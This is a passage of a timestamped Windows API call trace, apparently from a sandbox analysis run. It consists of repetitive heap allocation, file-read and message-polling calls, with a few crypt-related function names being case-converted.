hHeap=0x1780000) returned 1 [0127.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0127.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0127.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b8a020 [0127.896] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0127.896] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x7ee3, lpOverlapped=0x0) returned 1 [0127.898] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0127.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0127.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7ee3) returned 0x49aa010 [0127.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b8a020 | out: hHeap=0x1780000) returned 1 [0127.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0127.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7ee3) returned 0x49b1f00 [0128.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.065] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7ee3) returned 0x49aa010 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.066] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0128.066] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0128.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0128.067] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0128.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0128.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7ee3) returned 0x49aa010 [0128.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0128.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7ee3) returned 0x49b9df0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0128.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0128.069] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0128.069] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0128.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.069] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0128.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0128.070] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0128.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.071] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.072] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0128.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0128.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0128.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.073] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0128.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0128.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0128.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0128.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0128.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.076] HeapFree (in: hHeap=0x1780000, 